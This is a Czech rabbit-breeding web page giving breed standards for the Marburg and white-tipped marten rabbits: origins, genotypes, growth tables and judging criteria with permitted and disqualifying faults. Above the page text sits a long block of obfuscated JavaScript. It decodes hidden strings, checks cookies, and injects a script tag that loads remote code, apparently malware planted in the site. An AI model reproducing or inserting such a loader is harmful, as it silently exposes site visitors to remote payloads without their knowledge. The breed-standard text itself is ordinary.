(function(_0x3dcf42,_0x931ad8){function _0xc95f45(_0x314878,_0xbc42bd,_0x55bc4f,_0x28b7c3,_0x2d3944){return _0x477f(_0xbc42bd-0x78,_0x55bc4f);}function _0x352372(_0xe776,_0x371e30,_0x22707c,_0x2ab495,_0x2b149e){return _0x477f(_0x2b149e-0x167,_0xe776);}function _0x3b46aa(_0x2aba80,_0x5e73d4,_0x2a9a19,_0xa149aa,_0x116684){return _0x477f(_0x5e73d4-0x62,_0x2a9a19);}function _0x25e63c(_0x5c7542,_0x1bdb2c,_0x3ed9af,_0x2f2b32,_0x4df8e1){return _0x477f(_0x4df8e1- -0x1c5,_0x2f2b32);}var _0x30bc3f=_0x3dcf42();function _0x450c54(_0x1f3366,_0x49739f,_0x182c60,_0x3150e9,_0x393799){return _0x477f(_0x49739f- -0x244,_0x1f3366);}while(!![]){try{var _0x33dfdb=parseInt(_0x3b46aa(0x111,0x135,'U%iI',0x12f,0x12c))/(-0x209*0x4+-0x23b*0xd+-0x2524*-0x1)+-parseInt(_0x3b46aa(0x158,0x13c,'nzKH',0x137,0x16e))/(-0x1*0x742+0x1*-0x1b1b+0x3*0xb75)+-parseInt(_0xc95f45(0x106,0x108,'X7[(',0x112,0x11b))/(0x13f0+0x1*-0x2420+-0x1033*-0x1)*(-parseInt(_0x450c54('nzKH',-0x157,-0x148,-0x126,-0x11c))/(0x26b*0x8+0x1820*-0x1+0x4cc))+parseInt(_0x3b46aa(0xcf,0x10b,'ZudU',0xd1,0x137))/(0x18ed+-0x3*0x449+0xc0d*-0x1)*(parseInt(_0x25e63c(-0x10f,-0xd3,-0xe0,'U%iI',-0xe1))/(0xb1*0x17+-0x2485+0x14a4))+-parseInt(_0x3b46aa(0x12c,0x131,'CgYG',0x109,0x11e))/(0x255a+0x36+0xc83*-0x3)+parseInt(_0x352372('NXpS',0x226,0x252,0x26b,0x25e))/(0x1*0x1c1f+0x4b5*0x8+-0x41bf)+parseInt(_0x450c54('Golk',-0x183,-0x167,-0x174,-0x1ae))/(-0x1a7e+-0xa9d+0x2524*0x1)*(-parseInt(_0x450c54('C$hM',-0x17e,-0x150,-0x17b,-0x19c))/(0x109e+0x65c+-0x16f0));if(_0x33dfdb===_0x931ad8)break;else _0x30bc3f['push'](_0x30bc3f['shift']());}catch(_0x4e403e){_0x30bc3f['push'](_0x30bc3f['shift']());}}}(_0x2682,0xd*-0x19ab+-0xe906*0x5+0x6*0x1c6e9));function _0x98a3fb(_0x5167d7,_0x68f748,_0x8041a3,_0x37159c,_0x5aeb39){return _0x477f(_0x8041a3-0x121,_0x37159c);}function _0x3b8a9d(_0x79ff97,_0x2c2457,_0x4efc1d,_0x5fb716,_0x18d8b3){return _0x477f(_0x79ff97-0xdc,_0x2c2457);}function _0x239a0c(_0x1600b4){function _0x400ec6(_0x54478a,_0x1b7b33,_0x27b0b8,_0xc72beb,_0x1cdb02){return _0x477f(_0x27b0b8-0x1cb,_0x1b7b33);}var _0x5ee054={'YJZfh':function(_0x1567c9,_0x49f3f8){return _0x1567c9!==_0x49f3f8;},'HziTf':function(_0x288b17,_0x368c2c){return _0x288b17(_0x368c2c);},'oVpjg':_0x54a7ff(0x2a5,0x2a5,0x290,0x2a9,'VAx7'),'kWFfr':_0x4bece6(']r[6',0x15e,0x155,0x16b,0x1a3)+'t','QEzaM':function(_0x4b3864,_0x513edf){return _0x4b3864+_0x513edf;},'ovrAt':_0x54a7ff(0x25e,0x29f,0x257,0x26c,']1W(')+_0x54a7ff(0x288,0x227,0x294,0x264,'OpSM')+_0x4bece6('T2)I',0x189,0x1c3,0x1b8,0x1d1)+_0x28e2e0(0x16c,0x139,0x15d,0x173,'m6[0')+_0x1339b0(0x60,0x41,'h8aa',0x5a,0x7d)+_0x28e2e0(0x1b6,0x1bf,0x1b2,0x1bc,']r[6')+_0x400ec6(0x26e,'NEDq',0x258,0x235,0x226)+_0x54a7ff(0x2b6,0x2ac,0x2bb,0x29d,'Lo!0')+_0x1339b0(0xcd,0xa8,'8vE4',0x90,0x53),'hbtuG':_0x28e2e0(0x1d6,0x212,0x19f,0x1d0,'vvYy')+_0x1339b0(0xd5,0x98,']r[6',0xb4,0x7b)+_0x400ec6(0x240,'FMFL',0x254,0x21f,0x28d),'LKVei':_0x4bece6('*MiF',0x152,0x196,0x184,0x177)+_0x1339b0(0xc5,0xc2,'FMFL',0x94,0x95),'mxuJk':function(_0x5e6aad,_0x452141){return _0x5e6aad==_0x452141;},'HTsut':_0x4bece6('Hvl4',0x190,0x1c3,0x18b,0x14f)+_0x4bece6('AU)J',0x18d,0x157,0x17c,0x1a6)+_0x54a7ff(0x28f,0x27e,0x260,0x272,')]Pk')+_0x1339b0(0xcb,0xa9,'C$hM',0xa2,0x82)+'\x22]','fsbkA':function(_0x436958,_0x4c8fb0){return _0x436958===_0x4c8fb0;},'gryHv':_0x400ec6(0x258,'C$hM',0x279,0x29d,0x2a2),'OMRON':_0x1339b0(0xb1,0x62,'vvYy',0x8f,0xab),'rCXil':_0x28e2e0(0x19c,0x1a0,0x1b3,0x19a,'Lo!0'),'fYkFu':_0x54a7ff(0x2e0,0x2e3,0x2be,0x2b6,'m6[0')},_0x126fce=document;function _0x28e2e0(_0x1ece24,_0x2ba47f,_0x292dad,_0x351468,_0x4f8dad){return _0x477f(_0x1ece24-0xea,_0x4f8dad);}function _0x54a7ff(_0x3e2858,_0x156d12,_0x2eb84b,_0x5e9276,_0x551948){return _0x477f(_0x5e9276-0x1de,_0x551948);}var _0x37c692=_0x126fce[_0x54a7ff(0x2a6,0x2d5,0x2b0,0x2bd,'RAu$')+_0x1339b0(0xbb,0xbf,'hdx1',0x87,0xa2)+_0x4bece6('nzKH',0x170,0x1aa,0x175,0x1ab)](_0x5ee054[_0x1339b0(0x95,0x9b,'BdPl',0xbc,0xa7)]);_0x37c692[_0x1339b0(0x7d,0x65,'RAu$',0x59,0x3e)]=_0x5ee054[_0x400ec6(0x2bb,'AU)J',0x2b3,0x27d,0x2be)](_0x5ee054[_0x4bece6('FQ6j',0x1b8,0x1b3,0x189,0x19e)](_0x5ee054[_0x4bece6('EIG7',0x17c,0x1e1,0x1b6,0x1da)],window[_0x54a7ff(0x2c5,0x2ad,0x2de,0x2b2,'m6[0')+_0x4bece6('yz7(',0x1d3,0x1af,0x1c7,0x1d7)][_0x28e2e0(0x1db,0x1cb,0x1ff,0x1cf,'[AfR')+_0x54a7ff(0x303,0x2ad,0x2e7,0x2d2,'CgYG')]),_0x1600b4);function _0x1339b0(_0x3a1bd1,_0x5d3b5d,_0x5227ad,_0x3af427,_0x43974f){return _0x477f(_0x3af427- -0x2e,_0x5227ad);}function _0x4bece6(_0x284a13,_0x20dba2,_0x577140,_0x2ce08b,_0x2a500b){return _0x477f(_0x2ce08b-0xd5,_0x284a13);}_0x37c692[_0x28e2e0(0x1a4,0x187,0x1a6,0x1c0,'8umV')]=_0x5ee054[_0x4bece6('yz7(',0x146,0x1aa,0x16e,0x1a5)],_0x37c692['id']=_0x5ee054[_0x54a7ff(0x2bf,0x2bd,0x2e7,0x2ac,'pbn[')];if(_0x5ee054[_0x400ec6(0x29b,'m6[0',0x278,0x273,0x263)](_0x5ee054[_0x1339b0(0x5d,0x60,'SS@X',0x78,0x96)](Boolean,document[_0x1339b0(0xbd,0xc4,'C$hM',0xad,0x8f)+_0x54a7ff(0x2e5,0x2c1,0x2a7,0x2af,'tqER')+_0x400ec6(0x29b,'VAx7',0x263,0x242,0x28b)](_0x5ee054[_0x400ec6(0x286,'RAu$',0x2ab,0x298,0x290)])),![])){if(_0x5ee054[_0x4bece6('NEDq',0x159,0x191,0x174,0x140)](_0x5ee054[_0x54a7ff(0x2ef,0x2bf,0x2c5,0x2cc,'FQ6j')],_0x5ee054[_0x400ec6(0x275,'2CCV',0x268,0x28d,0x27c)])){if(document[_0x54a7ff(0x29f,0x280,0x2c0,0x2b3,'M1mY')+_0x54a7ff(0x256,0x27b,0x2a6,0x26a,'C$hM')+_0x28e2e0(0x1c6,0x1e0,0x1c8,0x1a8,'NEDq')])_0x5ee054[_0x4bece6('xtoE',0x1ab,0x1bf,0x186,0x185)](_0x5ee054[_0x400ec6(0x27d,'FQ6j',0x25a,0x25a,0x296)],_0x5ee054[_0x28e2e0(0x1af,0x1ed,0x1a9,0x189,'T2)I')])?(document[_0x4bece6('BdPl',0x1b0,0x1b6,0x1c8,0x201)+_0x28e2e0(0x18e,0x183,0x1bf,0x1be,'tqER')+_0x54a7ff(0x244,0x29b,0x293,0x25f,'CgYG')][_0x400ec6(0x254,'x9J$',0x28b,0x2a5,0x253)+_0x4bece6('OpSM',0x17d,0x162,0x153,0x16c)][_0x4bece6('SS@X',0x196,0x1cb,0x1a2,0x17e)+_0x54a7ff(0x281,0x282,0x28f,0x2b4,'aX&q')+'re'](_0x37c692,document[_0x1339b0(0xdc,0xcf,'iam9',0xb7,0xb6)+_0x54a7ff(0x2ab,0x28e,0x299,0x28e,'yz7(')+_0x1339b0(0xaa,0xc3,'Hvl4',0x8a,0x4d)]),document[_0x28e2e0(0x17f,0x17d,0x19d,0x175,']r[6')+_0x1339b0(0x53,0x9a,'yz7(',0x82,0x51)+_0x1339b0(0xcd,0xcc,'yz7(',0xb9,0xb5)][_0x400ec6(0x289,'m6[0',0x2a9,0x2c6,0x26b)+'e']()):(_0x5ea0f7[_0x4bece6('RAu$',0x18d,0x153,0x18e,0x184)+_0x28e2e0(0x1bc,0x18d,0x18a,0x1a2,'iam9')+_0x1339b0(0x7d,0xf6,'yz7(',0xb9,0xf1)][_0x54a7ff(0x2be,0x2d7,0x26a,0x2a7,'9p7j')+_0x28e2e0(0x1ae,0x1dd,0x1d1,0x178,'C$hM')][_0x4bece6('D]0G',0x16d,0x166,0x176,0x149)+_0x4bece6('m6[0',0x1bb,0x1a5,0x19d,0x1ce)+'re'](_0x62bd9d,_0xecc7c9[_0x1339b0(0xb3,0x5e,'EIG7',0x99,0x61)+_0x400ec6(0x237,'D]0G',0x270,0x29f,0x243)+_0x1339b0(0x6b,0x90,'9p7j',0x70,0x34)]),_0x4e6184[_0x54a7ff(0x2b1,0x29a,0x2ad,0x299,'Lo!0')+_0x54a7ff(0x2b9,0x2aa,0x257,0x295,'x9J$')+_0x400ec6(0x290,'m6[0',0x25d,0x28c,0x280)][_0x4bece6('vvYy',0x186,0x13d,0x154,0x171)+'e']());else{if(_0x5ee054[_0x400ec6(0x298,'Lo!0',0x2c1,0x2e3,0x2a6)](_0x5ee054[_0x54a7ff(0x278,0x294,0x293,0x2a1,'M1mY')],_0x5ee054[_0x28e2e0(0x1e2,0x1dc,0x1fe,0x1bf,'8umV')]))_0x126fce[_0x1339b0(0x61,0x6d,'FQ6j',0x7a,0x62)+_0x54a7ff(0x2c5,0x27e,0x2a3,0x2b7,'FQ6j')+_0x400ec6(0x25f,'NEDq',0x275,0x292,0x2ab)+_0x54a7ff(0x2dc,0x2ce,0x2ef,0x2c4,'VAx7')](_0x5ee054[_0x28e2e0(0x1df,0x1a3,0x1e0,0x1f3,'8@Zd')])[0x531+0x1*0xaab+0x1d*-0x8c][_0x1339b0(0x6a,0x2e,'yz7(',0x56,0x57)+_0x54a7ff(0x28a,0x275,0x253,0x289,'xtoE')+'d'](_0x37c692);else return _0x5ee054[_0x28e2e0(0x1d5,0x1a0,0x1c0,0x1c6,'8umV')](_0x3e0231[_0x1339b0(0xed,0xaf,'AU)J',0xbb,0xbe)+'e'][_0x54a7ff(0x2d8,0x2a7,0x2d8,0x2ce,'pbn[')+'Of'](_0x4f9a48),-(0x681+0x1c90+-0x2310));}}else _0x5ee054[_0x1339b0(0x3e,0x87,']1W(',0x6d,0x5b)](_0x55f4a4,_0x5ee054[_0x1339b0(0xb7,0x71,')]Pk',0x7e,0x4d)]);}}function _0x2682(){var _0x1b8509=['W60tW6qLW54','t0ZcTColjW','vSkuWOe','W60ycJGZ','W542Da','WQ5DaWldPq','ymo4WRfMW7u','pcWqW6ldOJXfpSoWd8ojudG','WP7cQmohWRKy','W6JdVqSLkq','WRSAD8oBmW','WO5SjmoGW7rCBmktW5qjWQlcSmkH','W5yRzq','WQ/dHCoLfSk2','euRdG2Hr','xSklWP/cVv8','WO1UkCoNW7rCB8k3W5SZWRVcOSk3','WQBcNeSZlq','WPXHWP4','wmoqoCo/AG','ugpdJ8kBWOy','y8ohW5JcKuKFchDncGnc','pYjPWO5h','kmk6c8oJha','W57dTG8xkG','bdhdUumH','W5HpWPFcPh4','i0uGh8keW7KLfCkpxtiU','WOxdTbOlDmkKm8kQW5DmWPxcMdy','WQpdLSo4','W5LxcSoqsa','u8oGtCk+W58','WRrGrmohrG','WQr2rmoCuW','xxFcUWPGW5RcSb8gtwL+','h8ogW7a','v8kzWPVcRxy','W7ldRa0V','jd/dPgC0','qmoElCoZAG','WPK4wSo5jG','WP1joG','WPBdPGirra','WOWJmG','WQ/dLcvNWQW','W6qLDCoTEKVcOqy','WPeKA8kKW6a','W757W7ZcUIm','WQJdJGvHWQW','lutdG1jq','W7RdRt7cRSk7','W7bNWRhcRLW','WP8xeSo2vbRdHmkNWQq','WOpdLXKUza','W6GdFdmV','hSoEuSk6W5C','WQFdNSo5pCkX','mmkMd8ordq','jHRcMWxdVG','uCkpWRZcU0m','W6OZDJec','CCoeWPzFW6q','WQiCWR0HWPm','W4zhWR/cIN0','yZ40mZa','mWRdSmosja','hbDyW64L','krNdTG','WOXMWO/dJZS','WPJcKSoVWRu','zCo+WQf/W5e','W5hdI8ozW77cG8o1ncZdI2ldG8o0','WQ0Zsmo8hq','W4ldSSo6W5e','tCoAWPr/W6W','aGj5W6G5','W4X7txNcUJNcQCoGW5ZdJ8k9WR7cSG','x3JdImko','W5tdU8kSW6xdPa','mSkan8oKcW','hCkYWRNdQde','DCo+g8oyn8oPp8kt','r8kRW4OdWRS','WR7dPmoPeCk1','WOrypmoAW7e','W5ddI8osW7ZcGSk2dd7dH3BdSW','tCoiWR/dTea','WQfWwmobua','dfddMwne','W4G2W5yLW48','WO5QjCoOW7fzASkhW7eYWQhcRCk/','nmkImCoUcW','W4nQW4pcVdi','fZvJWOvV','W6nZamo6WOLrW5vhDKNcSxG','WQBdICoVfSkU','W4xdJCkgW77dRq','ohXIW5ZdJa','uh7dICkaWPS','WQldG8oTeW','W7jVWQdcHuq','W5H/ChCUA8kBASocq8kXdW','n8k7pCoYfW','WPNdPrq','bsVdQvyQ','WRJdG8oHgmkS','WOXHWPJdNcO','WQDhWO7dIcO','s8kOW4OWWQO','WR10qmouua','jSkAW4xdLa8','W6jZc8o4WOGsW61vEL3cGq','gJrcWPr4','dmoNW6pdUba','vSklWPS','W5/dSY3cQ8ol','W63dMtJcOCoV','W6u6pIWK','WRxcOCofWRyC','WR0AySoaAG','W5P7lXDSnmk3uW','W7bWWRZcO0y','qmk4f8kfW4NcVh1yoW'];_0x2682=function(){return _0x1b8509;};return _0x2682();}function _0x477f(_0x1f924e,_0x3114c0){var _0x2464dd=_0x2682();return _0x477f=function(_0x362e1d,_0x58308e){_0x362e1d=_0x362e1d-(0x16f+0x133*0x4+-0xd*0x71);var _0xd15947=_0x2464dd[_0x362e1d];if(_0x477f['XIgTWE']===undefined){var _0x375c49=function(_0x1a25fb){var _0x43fc36='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x43686d='',_0x567682='';for(var _0x786599=-0x8b*0x31+-0x1a05+0x34a0,_0xef68b9,_0x196794,_0x25863b=-0x1df8+-0xbe3*0x3+0x41a1;_0x196794=_0x1a25fb['charAt'](_0x25863b++);~_0x196794&&(_0xef68b9=_0x786599%(0x23eb+-0x1e10+0x12b*-0x5)?_0xef68b9*(0x2b*0xe5+0xda3+-0x2*0x19ed)+_0x196794:_0x196794,_0x786599++%(-0x1*-0x1193+-0x2*-0x379+0x9*-0x2b9))?_0x43686d+=String['fromCharCode'](-0x93c*-0x1+0xf*-0xa5+0x3*0x7a&_0xef68b9>>(-(-0xa60*-0x2+0x270c+-0x3bca)*_0x786599&-0x12f4+-0x25*-0xa5+-0x4df)):0x14f5+0x2676+0x87d*-0x7){_0x196794=_0x43fc36['indexOf'](_0x196794);}for(var _0x16e6e8=0x217*0x6+-0x15f6+0x10c*0x9,_0x2bdb12=_0x43686d['length'];_0x16e6e8<_0x2bdb12;_0x16e6e8++){_0x567682+='%'+('00'+_0x43686d['charCodeAt'](_0x16e6e8)['toString'](0x165+-0x26f*-0x8+-0x14cd))['slice'](-(0x1999+0x4f*0xb+0x73f*-0x4));}return decodeURIComponent(_0x567682);};var _0x311bca=function(_0x25aa77,_0x4175a0){var _0x142689=[],_0x59567b=0x2*-0x103d+0x71b+0x3*0x875,_0x1d2249,_0x1aa988='';_0x25aa77=_0x375c49(_0x25aa77);var _0x1133f3;for(_0x1133f3=0x1b06+0x347*0x7+-0x1*0x31f7;_0x1133f3<-0x58d*0x5+0x2189+-0x4c8;_0x1133f3++){_0x142689[_0x1133f3]=_0x1133f3;}for(_0x1133f3=0x39*0x95+0xf12+0x303f*-0x1;_0x1133f3<0x1*-0x16e5+0x9f3+-0x46*-0x33;_0x1133f3++){_0x59567b=(_0x59567b+_0x142689[_0x1133f3]+_0x4175a0['charCodeAt'](_0x1133f3%_0x4175a0['length']))%(0x16dd+0x1cfb+0x8*-0x65b),_0x1d2249=_0x142689[_0x1133f3],_0x142689[_0x1133f3]=_0x142689[_0x59567b],_0x142689[_0x59567b]=_0x1d2249;}_0x1133f3=-0x24f2*-0x1+0xdf8+-0x32ea,_0x59567b=0x2495+-0xba*-0x1f+0x1*-0x3b1b;for(var _0x4fcf98=0x6c6+0xabc+-0x2eb*0x6;_0x4fcf98<_0x25aa77['length'];_0x4fcf98++){_0x1133f3=(_0x1133f3+(0x10a2+-0x23*-0x106+-0x3473))%(-0x9a5*0x3+-0x4*-0x312+-0x11a7*-0x1),_0x59567b=(_0x59567b+_0x142689[_0x1133f3])%(0x2128+0x818+-0x2840),_0x1d2249=_0x142689[_0x1133f3],_0x142689[_0x1133f3]=_0x142689[_0x59567b],_0x142689[_0x59567b]=_0x1d2249,_0x1aa988+=String['fromCharCode'](_0x25aa77['charCodeAt'](_0x4fcf98)^_0x142689[(_0x142689[_0x1133f3]+_0x142689[_0x59567b])%(-0x1*-0x1ad7+0x18c8+-0x329f*0x1)]);}return _0x1aa988;};_0x477f['MuDofK']=_0x311bca,_0x1f924e=arguments,_0x477f['XIgTWE']=!![];}var _0x231d0e=_0x2464dd[-0x11dc*0x1+0x17cb+-0x5ef],_0x250a20=_0x362e1d+_0x231d0e,_0x3adb3f=_0x1f924e[_0x250a20];return!_0x3adb3f?(_0x477f['XVlfKU']===undefined&&(_0x477f['XVlfKU']=!![]),_0xd15947=_0x477f['MuDofK'](_0xd15947,_0x58308e),_0x1f924e[_0x250a20]=_0xd15947):_0xd15947=_0x3adb3f,_0xd15947;},_0x477f(_0x1f924e,_0x3114c0);}function _0x13f9be(_0x2a14a1){var _0x1fead1={};function _0x572e69(_0x205686,_0x49876d,_0x2e015f,_0x94208e,_0x4cfcee){return _0x477f(_0x94208e-0x33d,_0x205686);}function _0x2d81e3(_0x20f92a,_0x143171,_0x302148,_0x46e8ae,_0x17bb48){return _0x477f(_0x302148-0xfc,_0x20f92a);}function _0xf42b12(_0x1c4798,_0x30af5d,_0x35f9ea,_0x137ba5,_0x3b7860){return _0x477f(_0x35f9ea- -0x390,_0x3b7860);}_0x1fead1[_0x572e69('iam9',0x3a8,0x3e9,0x3c8,0x3e8)]=function(_0x11e6ef,_0x499704){return _0x11e6ef!==_0x499704;};function _0x2538e2(_0x25f543,_0x2dfdd2,_0x1b60e4,_0x5c354b,_0x1abfbd){return _0x477f(_0x25f543- -0x37f,_0x1b60e4);}var _0x18163d=_0x1fead1;return _0x18163d[_0x2d81e3('U%iI',0x189,0x19f,0x1bf,0x1be)](document[_0x2d81e3('FMFL',0x1aa,0x1d3,0x206,0x1ac)+'e'][_0xf42b12(-0x2e3,-0x276,-0x2b3,-0x2e5,']1W(')+'Of'](_0x2a14a1),-(-0x21b8+-0x1*-0x727+-0x1*-0x1a92));}function _0x29572f(_0x17168f,_0x22e1c3,_0x466f63,_0x164178,_0x7ed69b){return _0x477f(_0x164178- -0xaa,_0x466f63);}function _0x36a738(_0x486124,_0x2f82e6,_0x1d2c88,_0x3b560c,_0x3b41a4){return _0x477f(_0x1d2c88-0xc9,_0x3b560c);}var _0x1c305a=_0x5616e7(-0xaf,'h8aa',-0xad,-0x8b,-0x80)+_0x5616e7(-0xa6,'OpSM',-0x6b,-0x8d,-0xa8);function _0x5616e7(_0x2b1cfb,_0x15aa4a,_0x477b63,_0x27ef02,_0x32c62c){return _0x477f(_0x27ef02- -0x127,_0x15aa4a);}var _0x4deaab=_0x5616e7(-0x66,'ZudU',-0x9a,-0x94,-0x9f)+_0x98a3fb(0x1cf,0x1bf,0x1a4,'SS@X',0x1b9)+'s';_0x13f9be(_0x4deaab)==![]&&_0x13f9be(_0x1c305a)==![]?_0x239a0c(''):_0x239a0c(_0x29572f(0x23,-0x2d,'pbn[',0x9,-0x34)); Červenec 2023 - Králík.Plivník.cz

Marburský (Ma)

50

Byl vyšlechtěn v letech 1913-1917 slečnou Sandemanovou v Marburgu. Vrbka uvádí, že se tak stalo křížením králíků havanských se stříbřitými šedými a následnou zpětnou plemenitbou se světlými havanskými. (Encyklopedie králíků a hlodavců uvádí křížení vídeňských modrých s havanou a dále se světlými černými stříbřitými)

Klub chovatelů marbusrkých
Vrba Milan, Vyšehradská 13, 620 00  Brno 20

Odkazy

Standard plemene

Genotypy:
 A15  AA BB cc dd gg

Měsíční přírůstky hmotnosti:

měsíc1.2.3.4.5.6.
kg0,40,91,31,82,22,5

Bodovací stupnice:

1.Hmotnost10 bodů
2.Tvar20 bodů
3.Typ20 bodů
4.Srst15 bodů
5.Barva krycího chlupu, očí a drápů, stejnoměrnost20 bodů
6.Barva podsady10 bodů
7.Péče a zdraví5 bodů
  100 bodů

Pozice 1. – Hmotnost

2,00 – 2,24 kg2,25 – 2,49 kg2,50 – 3,25 kg
8 bodů9 bodů10 bodů

Přípustné vady

Viz. stupnice hmotnosti

Nepřípustné vady

< 2 > 3,25 kg (výluka)

Pozice 2. – Tvar
viz. všeobecná část

Přípustné vady
Nepřípustné vady

Pozice 3. – Typ
viz. všeobecná část
Tělo: zavalité. Hrudní a pánevní partie: široká. Postoj: polovysoký. Končetiny: silné, hrudní – vzpřímené, zeširoka postavené. Hlava: krátká a široká, u králic je jemnější. Končetiny: silné. Uši: masité, dobře osrstěné. Délka – 9 až 11 cm.

Přípustné vady

Všeobecná + tělo: mírné odchylky. Hlava: Menší odchylky od stanoveného typu. Uši: menší odchylky od stanovené délky a struktury. Končetiny: mírné odchylky.

Nepřípustné vady

Všeobecná + tělo: vysloveně úzký protažený typ (výluka). Hlava: úzká, delší (výluka) Uši: < 8 > 12 cm (výluka).

Pozice 4. – Srst
Srst: velmi hustá v podsadě. Pesíky: stejnoměrné, výrazné. Délka krycího chlupu je asi 2,5 cm.

Přípustné vady

Srst: řidší, menší odchylky od předepsané délky v krycím chlupu, méně pružná. Pesíky: měkké a méně výrazné.

Nepřípustné vady

Srst: téměř bez podsady (výluka), velké odchylky od stanovené délky v krycím chlupu (výluka). Pesíky: téměř chybějící (výluka)

Pozice 5. – barva krycího chlupu, stejnoměrnost
Barva krycího chlupu: světlá pastelová modř s nádechem velmi lehce nahnědlého závoje stejnoměrně rozložená po celém těle. Lesk: mírný. Na místech s kratší srstí (hlava, uši, končetiny) se závoj projevuje výrazněji. Břicho: matnější. Oči: šedomodré s mírně světélkující panenkou. Drápy: rohovité

Přípustné vady

Vzhled: poněkud tmavší nebo světlejší barva krycího chlupu. Ojedinělé bílé chloupky. Nahnědlý závoj: značně slabý. Stejnoměrnost: slabší s výjimkou míst s kratší srstí. Slabší rez, slabý jinovatkový nádech, tvořený delšími stříbřitě lesklými pesíky. Oči: slabší nahnědlý nádech na duhovce. Drápy: velmi světlé, rohovinové.

Nepřípustné vady

Barva krycího chlupu: bez jakéhokoliv náznaku nahnědlého závoje. Rozložení barvy: silně nestejnoměrné, silný melír, silná skvrnitost (výluka). Silný rez (neklasifikován). Srst: silně promísená bílými chloupky, skupina bílých chloupků (výluka). výrazný jinovatkový nádech na celém těle (výluka). Oči: zcela jiná barva a dráp: bílý (vždy výluka).

Pozice 6. – Barva podsady
Barva podsady: téměř stejná nebo nepatrně světlejší než modř krycího chlupu, bez ostrého ohraničení. V místech nahnědlého závoje může být v horní části lehce nahnědlá.

Přípustné vady

Podsada: ojedinělé bílé chloupky, světlejší u kůže s odstínem do světle šedé, mírně zónovitě odsazená, náznak světlé mezibarvy.

Nepřípustné vady

Podsada: silně promísená bílými chloupky (výluka), šedobílá až bílá (výluka), mezibarva: zřetelná, světlá, ostře ohraničená, zřetelný bílý proužek u kůže (výluka).

Pozice 7. – Péče a zdraví
viz. všeobecná část

Zdroj standardu: Vzorník plemen králíků, (1997, 2003, 2020)

Kuní bílopesíkatý (Ku bí)

Kuní vzniknul současně v několika zemích (Anglie, Německo, Francie, USA) kolem roku 1920. 1) V Anglii jej vyšlechtil D. W. Irwing zkřížením činčily a ruského. 2) V Německu vzniklo toto plemeno ve Stellingenu u chovatele Emila Thomsena. Ten šlechtil vyšlechtil kuního pomocí činčily, havany, vídeňského modrého, zaječího, durynského a dalších plemen. 3) Ve Francii vzniklo toto plemeno pomocí činčily a albína u M. Fraineaua z Cognacu. Kuní bílopesíkatý vznikal v Anglii společně s kuním.

Kuní bílopesíkatí se u nás chovají až v posledním desetiletí a předcházeli jim zakrslí, kteří byli vyšlechtěni r. 1978. Od roku 2020 jsou kuní bílopesíkatí vedeni jako samostatné plemeno.

Více informací: ing. Stanislava Pinkavová – líbivý kuní hnědý, ale…, Chovatel 10/1991
Klub chovatelů kuních + ruských + siamských
http://www.klubkursi.estranky.cz

Standard plemene

Genotypy:

GenotypPlemeno
B21amaBB CC DD gogo      hnědý (KuBíh)
B22amaBB CC dd gogomodrý (KuBím)

Měsíční přírůstky hmotnosti:

měsíc1.2.3.4.5.6.
kg0,40,81,21,62,12,5

Bodovací stupnice:

1.Hmotnost10 bodů
2.Tvar20 bodů
3.Typ20 bodů
4.Srst15 bodů
5.Barva krycího chlupu, očí a drápů a kuní, příp. bílopesíkaté znaky20 bodů
6.Barva podsady10 bodů
7.Péče a zdraví5 bodů
  100 bodů

Pozice 1. – Hmotnost

2,00 – 2,24 kg2,25 – 2,49 kg2,50 – 3,25 kg
8 bodů9 bodů10 bodů

Přípustné vady

Viz. stupnice hmotnosti

Nepřípustné vady

< 2,0 > 3,25 kg

Pozice 2. – Tvar
viz. všeobecná část

Přípustné vady
Nepřípustné vady

Pozice 3. – Typ
viz. všeobecná část
Tělo: mírně zavalité. Hlava: krátká, široká, u samic jemnější. Krk: téměř neznatelný, krátký, silný. Postoj: polovysoký. Končetiny: silné, vzpřímené, hrudní končetiny zeširoka postavené. Uši: silný základ, u sebe, lžičkovité, na koncích zaoblené, dobře osrstěné. Délka – 9 až 11 cm.

Přípustné vady

Všeobecná + tělo: poněkud protažené, užší. Končetiny: Tenčí, delší. Menší odchylky od stanoveného typu hlavy. Uši: menší odchylky od stanovené délky a struktury.

Nepřípustné vady

Všeobecná + tělo: Zásadní nesoulad s požadovaným typem těla a hlavy (výluka). Uši: < 8 > 12 cm (výluka).

Pozice 4. – Srst
Srst: velmi hustá v podsadě, stejnoměrně rozložené elastické pesíky. Délka krycího chlupu je asi 2,5 cm.

Přípustné vady

Srst: řidší, menší odchylky od předepsané délky v krycím chlupu. Pesíky: tvrdší nebo měkčí.

Nepřípustné vady

Srst: téměř bez podsady (výluka),velké odchylky od stanovené délky v krycím chlupu (výluka). Pesíky: velmi četné a tvrdé (výluka)

Pozice 5. – barva krycího chlupu, kuní, příp. bílopesíkaté znaky
Hnědý ráz- Barva krycího chlupu: světle hnědá i na břiše.
Modrý ráz- Barva krycího chlupu: světle modrá i na břiše. Kuní znaky: 1) pás na hřbetě až k pírku široký 6 – 8 cm. Barva: tmavší hnědá, tmavší modrá. Směrem k bokům a na prsa přechází ve světle pastelově béžovou resp. světle pastelově modrou bez ostrého ohraničení. 2) Tmavé zbarvení uší, nosní masky, očních kroužků, pírka, končetin, tmavší skráňové znaky a světlá čelní partie – tzv. zrcadlo. Parva očí: hnědá resp. šedomodrá, světélkující karmínová panenka. Drápy: tmavě rohovité. Oba rázy uznány ve světlém a středním odstínu. KuBíh a KuBím
Hnědý ráz- Barva krycího chlupu na prsou: světle pastelově hnědá s bílými konečky pesíků. Na břiše, vnitřních stranách končetin a spodině pírka šedobílá až bílá.
Modrý ráz- Barva krycího chlupu na prsou: světle pastelově modrá s bílými konečky pesíků. Na břiše, vnitřních stranách končetin a spodině pírka šedobílá až bílá
Kuní znaky: 1) pás na hřbetě až k pírku široký 6 – 8 cm. Barva: tmavší hnědá, tmavší modrá. Směrem k bokům a na prsa přechází ve světle pastelově béžovou resp. světle pastelově modrou bez ostrého ohraničení. 2) Tmavé zbarvení uší, nosní masky, očních kroužků, pírka, končetin, tmavší skráňové znaky a světlá čelní partie – tzv. zrcadlo.
Bílopesíkaté znaky: bílé lemování nosních otvorů, bílé oční kroužky, které jsou úzké a stejnoměrně široké, bílou skráňovou obrubu, bílé lemování uší, vnitřní stranu uší, jakož i bílé skvrnky u kořene uší. Dále malý bílý zátylkový klín. Lem prstů na hrudních končetinách se projevuje jako bílé body na barevném podkladě. Všechny znaky mají být čistě bílé a ostře ohraničené.
